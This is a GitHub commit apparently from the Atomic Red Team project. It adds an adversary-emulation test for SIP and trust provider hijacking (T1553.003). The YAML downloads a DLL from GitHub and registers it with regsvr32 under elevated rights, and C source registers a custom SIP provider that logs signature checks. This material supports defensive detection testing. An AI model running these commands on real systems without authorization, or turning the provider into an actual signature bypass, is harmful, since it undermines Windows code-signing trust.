Added initial test for technique T1553.003 (#2573)

Co-authored-by: unknown <[email protected]>
redcanaryco · Oct 18, 2023 · 03fe454 · 03fe454
1 parent 9b7db44
commit 03fe454
Show file tree

Hide file tree

Showing 3 changed files with 182 additions and 0 deletions.
diff --git a/atomics/T1553.003/T1553.003.yaml b/atomics/T1553.003/T1553.003.yaml
@@ -0,0 +1,32 @@
+attack_technique: T1553.003
+display_name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
+atomic_tests:
+- name: SIP (Subject Interface Package) Hijacking via Custom DLL
+  auto_generated_guid: e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675
+  description: |
+    Registers a DLL that logs signature checks, mimicking SIP hijacking. This test uses a DLL from 
+    https://github.com/gtworek/PSBits/tree/master/SIP and registers it using regsvr32, thereby causing
+    the system to utilize it during signature checks, and logging said checks.
+  supported_platforms:
+  - windows
+  input_arguments:
+    dll_payload:
+      description: Path to GTSIPProvider.dll 
+      type: path
+      default: PathToAtomicsFolder\T1553.003\bin\GTSIPProvider.dll
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      GTSIPProvider.dll must exist on disk at specified location (#{dll_payload})
+    prereq_command: |
+      if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/gtworek/PSBits/raw/2aa885c7d09f7f100997bfa5ee0c404084177f24/SIP/GTSIPProvider.dll" -OutFile "#{dll_payload}"
+  executor:
+    command: |
+      regsvr32.exe #{dll_payload}
+    cleanup_command: |
+      regsvr32.exe /u #{dll_payload}
+    name: command_prompt
+    elevation_required: true
diff --git a/atomics/T1553.003/bin/GTSIPProvider.dll b/atomics/T1553.003/bin/GTSIPProvider.dll
diff --git a/atomics/T1553.003/src/GTSIPProvider.c b/atomics/T1553.003/src/GTSIPProvider.c
@@ -0,0 +1,150 @@
+#pragma comment(lib, "Crypt32.lib")
+#include <Windows.h>
+#include <tchar.h>
+#include <mssip.h>
+#include <Psapi.h>
+
+#define DLLEXPORT __declspec(dllexport)
+
+GUID guid_GTSIP =
+{
+	0x00000000, 0xDEAD, 0xBEEF, {0xDE, 0xAD, 0xDE, 0xAD, 0xBA, 0xBE, 0xCA, 0xFE}
+};
+
+
+DLLEXPORT
+STDAPI
+DllRegisterServer(VOID)
+{
+	TCHAR strMsg[1024];
+
+	_stprintf_s(strMsg, _countof(strMsg), TEXT("[GTSIP] %hs."), __func__);
+	OutputDebugString(strMsg);
+
+	TCHAR szFilePath[MAX_PATH];
+
+	GetModuleFileName(GetModuleHandle(TEXT("GTSIPProvider.dll")), szFilePath, MAX_PATH);
+
+	_stprintf_s(strMsg, _countof(strMsg), TEXT("[GTSIP] %hs says DLL = %s."), __func__, szFilePath);
+	OutputDebugString(strMsg);
+
+	SIP_ADD_NEWPROVIDER sProv = {0};
+	sProv.cbStruct = sizeof(SIP_ADD_NEWPROVIDER);
+	sProv.pgSubject = (GUID*)&guid_GTSIP;
+	sProv.pwszDLLFileName = szFilePath;
+	sProv.pwszMagicNumber = NULL;
+	sProv.pwszIsFunctionName = NULL; // L"GtSipIs";
+	sProv.pwszGetFuncName = L"GtSipGet";
+	sProv.pwszPutFuncName = L"GtSipPut";
+	sProv.pwszCreateFuncName = L"GtSipCreate";
+	sProv.pwszVerifyFuncName = L"GtSipVerify";
+	sProv.pwszRemoveFuncName = L"GtSipRemove";
+	sProv.pwszIsFunctionNameFmt2 = L"GtSipIsFmt2";
+	sProv.pwszGetCapFuncName = L"GtSipGetCap";
+
+	if (!CryptSIPAddProvider(&sProv))
+	{
+		return HRESULT_FROM_WIN32(GetLastError());
+	}
+
+	return S_OK;
+}
+
+
+DLLEXPORT
+STDAPI
+DllUnregisterServer(VOID)
+{
+	TCHAR strMsg[1024];
+	_stprintf_s(strMsg, _countof(strMsg), TEXT("[GTSIP] %hs."), __func__);
+	OutputDebugString(strMsg);
+	CryptSIPRemoveProvider(&guid_GTSIP);
+	return S_OK;
+}
+
+
+DLLEXPORT
+BOOL
+WINAPI
+GtSipIs(
+	HANDLE hFile,
+	GUID* pgSubject
+)
+{
+	TCHAR strMsg[1024];
+	TCHAR szFilePath[MAX_PATH];
+
+	GetFinalPathNameByHandle(hFile, szFilePath, MAX_PATH, FILE_NAME_NORMALIZED);
+
+	_stprintf_s(strMsg, _countof(strMsg), TEXT("[GTSIP] %hs obtained %s as a parameter."), __func__, szFilePath);
+	OutputDebugString(strMsg);
+
+	SetLastError(0);
+	return FALSE;
+}
+
+
+DLLEXPORT
+BOOL
+WINAPI
+GtSipIsFmt2(
+	WCHAR* pwszFileName,
+	GUID* pgSubject
+)
+{
+	TCHAR strMsg[1024];
+	_stprintf_s(strMsg, _countof(strMsg), TEXT("[GTSIP] %hs obtained %ws as a parameter."), __func__, pwszFileName);
+	OutputDebugString(strMsg);
+
+	SetLastError(0);
+	return FALSE;
+}
+
+
+DLLEXPORT
+BOOL
+WINAPI
+GtSipGetCap(
+	SIP_SUBJECTINFO* pSubjectInfo,
+	SIP_CAP_SET* pCaps)
+{
+	TCHAR strMsg[1024];
+	_stprintf_s(strMsg, _countof(strMsg), TEXT("[GTSIP] %hs obtained %ws as a parameter."), __func__,
+	            pSubjectInfo->pwsFileName);
+	OutputDebugString(strMsg);
+
+	pCaps->dwVersion = 2;
+	pCaps->isMultiSign = 1;
+	pCaps->dwReserved = 0;
+	return TRUE;
+}
+
+
+BOOL APIENTRY DllMain(HMODULE hModule,
+                      DWORD ul_reason_for_call,
+                      LPVOID lpReserved
+)
+{
+	TCHAR strMsg[1024] = {0};
+	TCHAR szFilePath[MAX_PATH];
+
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+		GetProcessImageFileName(GetCurrentProcess(), szFilePath, MAX_PATH);
+		_stprintf_s(strMsg, _countof(strMsg), TEXT("[GTSIP] %hs says EXE = %s"), __func__, szFilePath);
+		break;
+	case DLL_THREAD_ATTACH:
+		break;
+	case DLL_THREAD_DETACH:
+		break;
+	case DLL_PROCESS_DETACH:
+		break;
+	default:
+		break;
+	}
+
+	OutputDebugString(strMsg);
+
+	return TRUE;
+}